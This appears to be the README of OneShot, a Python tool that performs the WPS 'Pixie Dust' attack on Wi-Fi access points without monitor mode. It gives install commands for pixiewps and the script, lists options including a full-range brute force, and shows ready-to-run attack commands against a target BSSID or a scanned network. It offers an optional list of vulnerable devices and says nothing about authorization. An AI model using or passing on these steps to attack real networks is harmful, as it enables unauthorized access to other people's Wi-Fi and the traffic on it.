OneShot performs Pixie Dust attack without having to switch to monitor mode.
- Python 3.6 and above;
- Wpa supplicant;
- Pixiewps.
Installing requirements
sudo apt install -y python3 wpasupplicant iw wget
Installing Pixiewps
Ubuntu 18.04 and above or Debian 10 and above
sudo apt install -y pixiewps
Other versions
sudo apt install -y build-essential unzip
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make
sudo make install
Getting OneShot
cd ~
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py
Optional: getting a list of vulnerable to pixie dust devices for highlighting in scan results:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
Installing requirements
sudo pacman -S wpa_supplicant pixiewps wget python
Getting OneShot
cd ~
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py
Optional: getting a list of vulnerable to pixie dust devices for highlighting in scan results:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
oneshot.py <arguments>
Required Arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional Arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-F, --force : Run Pixiewps with --force option (bruteforce full range)
-X : Alway print Pixiewps command
-v : Verbose output
Start Pixie Dust attack on a specified BSSID:
sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
Show avaliable networks and start Pixie Dust attack on a specified network:
sudo python3 oneshot.py -i wlan0 -K
Monohrom
for testing, help in catching bugs, some ideas;Wiire
for developing Pixiewps.